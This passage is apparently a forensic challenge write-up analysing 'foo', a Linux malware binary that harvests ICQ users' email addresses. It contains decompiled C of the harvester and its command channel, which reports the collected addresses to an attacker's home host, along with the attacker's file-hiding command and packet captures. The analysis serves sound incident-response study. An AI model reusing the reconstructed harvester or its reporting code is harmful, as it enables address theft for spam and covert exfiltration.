 80489a9:       89 e5                   mov    %esp,%ebp
 80489ab:       83 ec 04                sub    $0x4,%esp
 80489ae:       8d 45 fc                lea    0xfffffffc(%ebp),%eax
 80489b1:       50                      push   %eax
 80489b2:       68 1b 54 00 00          push   $0x541b
 80489b7:       8b 45 08                mov    0x8(%ebp),%eax
 80489ba:       50                      push   %eax
 80489bb:       e8 6c bb 01 00          call   0x806452c                <ioctl>
 80489c0:       83 c4 0c                add    $0xc,%esp
 80489c3:       89 c0                   mov    %eax,%eax
 80489c5:       83 f8 ff                cmp    $0xffffffff,%eax
 80489c8:       75 0a                   jne    0x80489d4
 80489ca:       b8 ff ff ff ff          mov    $0xffffffff,%eax
 80489cf:       eb 0b                   jmp    0x80489dc
 80489d1:       8d 76 00                lea    0x0(%esi),%esi
 80489d4:       8b 45 fc                mov    0xfffffffc(%ebp),%eax
 80489d7:       eb 03                   jmp    0x80489dc
 80489d9:       8d 76 00                lea    0x0(%esi),%esi
 80489dc:       89 ec                   mov    %ebp,%esp
 80489de:       5d                      pop    %ebp
 80489df:       c3                      ret    

Put in plain C, this looks like:

int
bytes_avail(int sock)
{
	int res;

	if (ioctl(sock, FIONREAD, &res) == -1)
	   return -1;

	return res;
}
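
The FIONREAD request (0x541b on Linux) asks the kernel how many bytes
are waiting to be read. The sketch below shows the call in isolation,
with a pipe standing in for the socket so that it needs no network;
the function name and the pipe are assumptions of this example, not
something found in foo.

```c
#include <sys/ioctl.h>
#include <unistd.h>

/* Write `n` bytes into a fresh pipe and ask the kernel, via FIONREAD,
 * how many bytes are waiting on the read end. Returns that count, or
 * -1 on error. */
int pending_after_write(int n)
{
	char data[64] = { 0 };
	int fds[2], avail = -1;

	if (n < 0 || n > (int)sizeof data || pipe(fds) < 0)
		return -1;

	if (write(fds[1], data, (size_t)n) != n ||
	    ioctl(fds[0], FIONREAD, &avail) == -1)
		avail = -1;

	close(fds[0]);
	close(fds[1]);
	return avail;
}
```

A result of 0 simply means that nothing has arrived yet, which is the
case a caller of bytes_avail() has to poll for.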

Now it's time to look at the two other functions. I will not quote the
disassembly here, but rather the translated C source. They don't look
very pretty but they're readable.

Two global variables seem to be used, one of which was declared static
(it's in the .bss section).

unsigned int start_uin;		/* 0x0807ad84 */
static int buf_len;		/* 0x08080f38 */

int
function1(int uin, char *retbuf)
{
	int sock, cnt;
	int l3;
	char buffer[1024];

	l3 = 1;

	/* return next UIN if this block was not
	   finished */
	if ((uin <= start_uin + 98) && (start_uin != 0))
	   return uin + 1;

	sock = nblk_udp_socket();

	/* this means we have something to send home */
	if (strlen(retbuf) > 3) {
	   
		/* try to send it until confirmation is received or
		   we timeout. Looks like there is a bug in the
		   handling of buf_len ?!
		 */
	   	while (l3) {
		        cnt = 0;

			retbuf[buf_len++] = '\0';

		        while (cnt <= 10) {
			    send_home_message(sock, retbuf, buf_len);

			    sleep(10);

			    cnt++;

			    if (recv_home_message(sock, buffer, 1000) > 0) {
				if (! strncmp(buffer, "GOT", 3)) {
				  l3 = 0;

				  break;
				}
			    }
			}

			if (cnt > 10)
			   exit(0);
		}
	}

	/* Request new block of UINs to collect */
	cnt = 0;

	while (cnt <= 10) {
	      send_home_message(sock, "GU\n", 3);

	      sleep(10);

	      cnt++;

	      if (recv_home_message(sock, buffer, 1000) > 0) {

	         /* maybe we're being asked to shut up */
		 if (! strncmp(buffer, "DIE", 3)) {
		    fd_close(sock);
		    exit(0);
		 }

		 /* ... or we receive new work */
		 if (! strncmp(buffer, "DU", 2)) {

		    /* 0x0804de0c, most likely sscanf */
		    sscanf(buffer + 2, "%lu", &start_uin);

		    memset(retbuf, 0, 30000);

		    /* 0x0804ddf4, identified as _IO_sscanf, but
		       rather it is sprintf */

		    sprintf(retbuf, "SE%lu\n", start_uin);

		    buf_len = strlen(retbuf);

		    fd_close(sock);

		    return start_uin;
		 }
	      }
	}

	fd_close(sock);
	exit(0);
}

void
function2(int uin, char *retbuf, int retsize)
{
	struct sockaddr_in saddr;
	int sock, cnt, run, state;
	char buffer[1024];
	char c1, c2;
	time_t req_sent;

	run = 1;
	state = 0;

	c1 = ' ';
	req_sent = 0;

	saddr.sin_addr.s_addr = ip_address("web.icq.com");
	saddr.sin_family = AF_INET;
	saddr.sin_port   = htons(80);

	sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if (connect(sock, (struct sockaddr *) & saddr, 
			  sizeof(struct	sockaddr_in)) == -1) {

		      close(sock);
		      return;
	}

	sleep(1);

	fcntl(sock, F_SETFL, O_NONBLOCK);

	sprintf(buffer, "GET /wwp?Uin=%lu HTTP/1.0\r\nHost: web.icq.com\r\n\r\n", uin);

	send(sock, buffer, strlen(buffer), 0);

	req_sent = time(NULL);

	while (run) {

	      if (time(NULL) - req_sent > 25)
		 run = 0;

	      if (! bytes_avail(sock))
		 continue;

	      cnt = read(sock, &c2, 1);

	      if (cnt != 1)
		 continue;

	      /* state is like this:

		 0 - look for '"'
		 1 - inside quotes, check if this is a mailto (state 2),
		     otherwise go back in state 0
		 2 - copy email address until quote is found or buffer
		     runs out
	       */
		 
	      if (state == 0) {

		 if (c2 == '"')
		    state = 1;

	      } else if (state == 1) {
		
		if ((c1 == '"') && (c2 != 'm'))
		   state = 0;

		if ((c1 == 'm') && (c2 != 'a'))
		   state = 0;

		if ((c1 == 'a') && (c2 != 'i'))
		   state = 0;

		if ((c1 == 'i') && (c2 != 'l'))
		   state = 0;

		if ((c1 == 'l') && (c2 != 't'))
		   state = 0;

		if ((c1 == 't') && (c2 != 'o'))
		   state = 0;

		if ((c1 == 'o') && (c2 != ':'))
		   state = 0;

		/* found "mailto:, go to state 2 */

		if ((c1 == 'o') && (c2 == ':'))
		   state = 2;

	      } else if (state == 2) {

		 if (buf_len > retsize - 1) {
		    close(sock);
		    sleep(1);
		 }

		 if (c2 == '"') {
		    retbuf[buf_len++] = '\n';
		    close(sock);
		    sleep(1);
		    return;
		 }

		 if (isprint(c2))
		    retbuf[buf_len++] = c2;
	      }

	      /* save last char */
	      c1 = c2;
	}

	close(sock);
}

By now, the purpose of the program is quite clear. It will contact
the home address of the attacker, using UDP on port 53413, and say
hello ("GU"). There are two possible answers to this greeting. One is
"DIE", which instructs the program to exit, and the other is
"DUxxxxxxx", where xxxxxxx is a decimal number.

The number following the "DU" string is the start of a block of 100
ICQ user IDs whose profiles will be harvested for email addresses. 
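
The block size of 100 follows from the test at the top of function1
(uin <= start_uin + 98). The sketch below replays that bookkeeping
without any networking to count the UINs probed per block. Both
function names are made up, and returning 0 to signal "request a new
block" is a simplification of what function1 really does at that
point.

```c
/* Mirror of the test at the top of function1(): while the block is
 * unfinished, hand out the next UIN; otherwise return 0 to signal that
 * a new block has to be requested. */
unsigned int next_uin(unsigned int uin, unsigned int start_uin)
{
	if (start_uin != 0 && uin <= start_uin + 98)
		return uin + 1;
	return 0;
}

/* Count how many UINs get probed for one block, following main():
 * function1() yields a UIN, function2() probes it, repeat. */
unsigned int uins_per_block(unsigned int start_uin)
{
	unsigned int uin = start_uin;	/* value returned with the DU reply */
	unsigned int probed = 0;

	while (uin != 0) {
		probed++;		/* function2(uin, ...) would run here */
		uin = next_uin(uin, start_uin);
	}
	return probed;
}
```

Starting at start_uin, the probed IDs run from start_uin up to and
including start_uin + 99.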

function1 is responsible for communication with the attacker's home
machine and for setting up the next ICQ ID to probe, while function2
retrieves the profile, looks for the string '"mailto:' and copies the
email address into the large buffer (30000 bytes) allocated in the
main function. Email addresses are separated by newlines.
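
The extraction step is easier to follow when written against a
complete, NUL-terminated page instead of one byte at a time. The
sketch below does the same job with strstr(); it is an illustration
under that assumption and not a reconstruction of foo's state machine,
and extract_mailto is an invented name.

```c
#include <stddef.h>
#include <string.h>

/* Copy the address that follows the first "mailto: marker in `html`
 * into `out` (up to the closing quote). Returns 1 on success, 0 if no
 * marker or closing quote is found or `out` is too small. */
int extract_mailto(const char *html, char *out, size_t outlen)
{
	static const char marker[] = "\"mailto:";
	const char *start, *end;
	size_t n;

	start = strstr(html, marker);
	if (start == NULL)
		return 0;
	start += sizeof marker - 1;

	end = strchr(start, '"');
	if (end == NULL)
		return 0;

	n = (size_t)(end - start);
	if (n + 1 > outlen)
		return 0;

	memcpy(out, start, n);
	out[n] = '\0';
	return 1;
}
```

Unlike the code in foo, this version checks the output size before
copying anything.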

When 100 user IDs have been harvested, the result is sent home. The
buffer looks something like:

SExxxxxxxx    <---- this is the start of the block
email1@email.com
email2@email.com
...

etc
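
A minimal sketch of how such a report could be assembled follows. I am
assuming here that the number after "SE" is the first ICQ ID of the
block; build_report is a hypothetical name, and snprintf() is my choice,
not something recovered from the binary.

```c
#include <stddef.h>
#include <stdio.h>

/* Format "SE<start>\n" followed by the harvested addresses, which are
   expected to be newline-terminated already. Returns the length of the
   report, or 0 if it does not fit into buf. */
static size_t build_report(char *buf, size_t size, long start_uin,
                           const char *addresses)
{
    int n = snprintf(buf, size, "SE%ld\n%s", start_uin, addresses);

    if (n < 0 || (size_t)n >= size)
        return 0;               /* error or truncated output */

    return (size_t)n;
}
```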

After sending this buffer, the foo program expects a confirmation from
the home machine: a packet containing the "GOT" acknowledgment. If the
acknowledgment is received, the program sends the "GU" greeting again
and waits for more instructions (DIE or DUxxxxxxx).

Let's take a look at the snort log again. First, let's filter out the
connections to the ICQ webservers (205.188.248.25, 205.188.248.57,
205.188.248.89).

(03-no-foo-download.log contains all traffic except NVP backdoor
traffic and the download of the foo file)

void:~$ tcpdump -r 03-no-foo-download.log -w 05-no-icq.log host not web.icq.com

Let's examine home communication:

void:~$ tcpdump -r 05-no-icq.log -X udp and port 53413

22:57:55.439307 172.16.183.2.1025 > 11.11.11.11.53413:  udp 3
0x0000   4500 001f 00c9 0000 4011 d6fd ac10 b702        E.......@.......
0x0010   0b0b 0b0b 0401 d0a5 000b 36d4 4755 0a          ..........6.GU.

22:57:55.493471 11.11.11.11.53413 > 172.16.183.2.1025:  udp 10
0x0000   4500 0026 0363 0000 3511 df5c 0b0b 0b0b        E..&.c..5..\....
0x0010   ac10 b702 d0a5 0401 0012 7922 4455 3932        ..........y"DU92
0x0020   3037 3130 300a                                 07100.

Hmm, only two packets. The first is the "GU\n" greeting from the
program to the home machine, the second is from the home machine and
instructs the program to start harvesting from ICQ ID 9207100.
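
To make the reading of the hex dump explicit, here is a small sketch
that locates the UDP payload inside a raw IPv4 packet as printed by
tcpdump -X (no link-layer header). The function name udp_payload is
hypothetical. For the second packet above the IP header is 20 bytes, the
UDP length field is 0x0012 (18 = 8 header bytes + 10 data bytes), and
the 10 data bytes are "DU9207100\n".

```c
#include <stddef.h>

/* Locate the UDP payload inside a raw IPv4 packet. Returns a pointer to
   the payload and stores its length in *payload_len, or returns NULL if
   the packet is not IPv4/UDP or is truncated. */
static const unsigned char *udp_payload(const unsigned char *pkt,
                                        size_t len, size_t *payload_len)
{
    size_t ihl, udp_len;

    if (len < 20 || (pkt[0] >> 4) != 4 || pkt[9] != 17)
        return NULL;                     /* not IPv4 carrying UDP */

    ihl = (size_t)(pkt[0] & 0x0f) * 4;   /* IP header length in bytes */
    if (ihl < 20 || len < ihl + 8)
        return NULL;

    /* UDP length field: header (8 bytes) plus data, big-endian */
    udp_len = ((size_t)pkt[ihl + 4] << 8) | pkt[ihl + 5];
    if (udp_len < 8 || ihl + udp_len > len)
        return NULL;

    *payload_len = udp_len - 8;
    return pkt + ihl + 8;
}
```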

Looking at the number of flows to the ICQ server we can find all 100
requests, but the UDP packet which reports home was not found in the
snort log. It was either removed from the snort log in order to
obfuscate it, or the program has a bug which I cannot find :-(


4. Answers
----------

4.1 What is the attacker's IP address?

Most likely, this is 216.242.103.2. This is the address the foo
program was downloaded from, as well as the address from which the
'foo' program expects its instructions and to which it sends its
results.


4.2 What is the attacker doing first? What do you think is his/her
motivation for doing this?

First, the attacker checks whether this machine is a nameserver for
some domains. His motivation could be to forge some host names, so
that they appear to belong to one of the domains served by this
nameserver.


4.3 Why there is some readable text in packets #17-#25 (and some
others), but not in packets #15-#16 (and several others)? What
differentiates these groups of packets from each other?

I assume the padding in the NVP backdoor traffic is not encrypted, and
the clear text in those packets is leftover content of the memory
buffer used to decrypt previous packets.


4.4 What is the purpose of 'foo'? Can you provide more insights about
the internal workings of 'foo'? Do you think that 'foo' was coded by a
good programmer or by an amateur?

Please refer to section 3.2, where a detailed analysis of 'foo' was
performed. 

The purpose of this program is to harvest email addresses of ICQ
users.

The program was coded by a beginner. There is unnecessarily complex
code to daemonize the process, nonblocking I/O is incorrectly used
(for instance, the program is busy-waiting in function2() for data),
the check for an error return value from socket() is wrong, ip_address
is not needed since gethostbyname() is enough to parse a dotted
decimal representation of a host's IP address, etc.
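
To illustrate the last two points, here is a minimal sketch (not the
code from the binary; resolve_ipv4 and open_udp_socket are hypothetical
names). gethostbyname() accepts a dotted decimal string directly and
performs no lookup in that case, and socket() signals failure with -1,
so the descriptor is tested with "< 0". gethostbyname() is obsolete
today; getaddrinfo() is the modern replacement, but I use the older call
because it is the one discussed above.

```c
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

/* Resolve a host name or a dotted decimal string to an IPv4 address.
   Returns 0 on success, -1 on failure. */
static int resolve_ipv4(const char *host, struct in_addr *out)
{
    struct hostent *he = gethostbyname(host);

    if (he == NULL || he->h_addrtype != AF_INET || he->h_length != 4)
        return -1;

    memcpy(out, he->h_addr_list[0], 4);
    return 0;
}

/* Open a UDP socket. socket() returns -1 on error, and 0 is a valid
   descriptor, so the test has to be "< 0" rather than "== 0". */
static int open_udp_socket(void)
{
    int fd = socket(AF_INET, SOCK_DGRAM, 0);

    return (fd < 0) ? -1 : fd;
}
```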


4.5 What is the purpose of './ttserve ; rm -rf /tmp/ttserve' as done
by the attacker?

This is done by the attacker to hide the existence of the 'foo' binary
on the compromised system.

Once ttserve (the downloaded 'foo' program) is launched, it
daemonizes itself and hides from 'ps' by overwriting its command line
so it appears to be "(nfsiod)" running as user daemon, thus a system
process.

If the program is running when the executable file is rm'ed, the file
is not really deleted from disk: only its directory entry is removed.
Since the inode is still in use (because the program is running), the
file's data is actually freed only when the program terminates.
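
The same behaviour can be observed with an ordinary open file, which
holds a reference to the inode in much the same way a running
executable does. The sketch below is only a demonstration under that
analogy; the function name and the /tmp path template are my own.

```c
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Returns 1 if data can still be written to and read from a file
   through an open descriptor after its name has been unlinked,
   0 if not, and -1 if the temporary file could not be set up. */
static int readable_after_unlink(void)
{
    char path[] = "/tmp/unlink-demo-XXXXXX";
    char buf[8] = {0};
    int fd = mkstemp(path);
    int ok;

    if (fd < 0)
        return -1;

    if (unlink(path) != 0) {    /* remove the only directory entry */
        close(fd);
        return -1;
    }

    /* the name is gone, but the inode lives on while fd is open */
    ok = access(path, F_OK) != 0
         && write(fd, "hello", 5) == 5
         && lseek(fd, 0, SEEK_SET) == 0
         && read(fd, buf, 5) == 5
         && memcmp(buf, "hello", 5) == 0;

    close(fd);  /* last reference dropped: the storage is freed now */
    return ok;
}
```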


4.6 How do you think the attacker will use the results of his activity
involving 'foo'? 

My first guess was that his activity (collecting email addresses of
ICQ users) was related to a possible ICQ hack (stealing of ICQ
accounts). 

This cannot be true, since there is no way the attacker is going to be
able to tell which UIN a certain email address belongs to. Even though
UINs are scanned sequentially, some UINs are not in use any more and
on those UINs' profile pages there will be no email address listed,
thus no line will be generated for those UINs in the report packet.

Actually, there are 164 email addresses in those 100 tcp flows to
web.icq.com. Of those, 88 are email addresses of the form
UIN@pager.icq.com for an email-to-icq gateway at icq.com and 76
addresses are listed as user email addresses. However, only the first 
email address is saved, so there is no way this address (@pager.icq.com)
can be related to the real email address.

My best guess is that these email addresses are harvested for spamming
(possibly to sell the lists to spammers), nothing more.


Bonus Question: 

4.7 If you administer a network, would you have caught such NVP
backdoor communication? If yes, how? If you do not administer a
network, what do you think is the best way to prevent such
communication from happening and/or detect it?

Because of a lack of system administration resources, I wouldn't have
detected the NVP backdoor traffic in a timely manner, as the firewall
logs are only analyzed from time to time. However, the firewall
wouldn't have allowed this traffic to pass, as we're implicitly
denying whatever is not explicitly allowed, thus blocking this kind of
communication and rendering the backdoor unusable.

I believe this is a good policy, as an attacker would be forced to use
an "open" communication channel, which is less likely to be possible
if the attack (wu-ftpd exploit, installation of backdoor, etc) is
automated. The attacker would first have to look for some means of
passing traffic through the firewall and adapt the backdoor server
accordingly.
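
On the detection side, the check itself is simple: the protocol number
sits at byte 9 of the IPv4 header, and NVP is protocol 11. The sketch
below flags anything that is not ICMP, TCP or UDP. That allowed set is
my assumption about a typical site policy, and is_unusual_ip_proto is a
hypothetical name.

```c
#include <stddef.h>

/* Return 1 if the IPv4 header carries a protocol other than ICMP (1),
   TCP (6) or UDP (17), and 0 otherwise (including when the buffer is
   too short or is not IPv4). */
static int is_unusual_ip_proto(const unsigned char *ip_hdr, size_t len)
{
    unsigned char proto;

    if (len < 20 || (ip_hdr[0] >> 4) != 4)
        return 0;

    proto = ip_hdr[9];          /* protocol field of the IPv4 header */
    return proto != 1 && proto != 6 && proto != 17;
}
```

Fed with the headers of captured packets, such a check would flag every
packet of the backdoor conversation, since all of them use protocol 11.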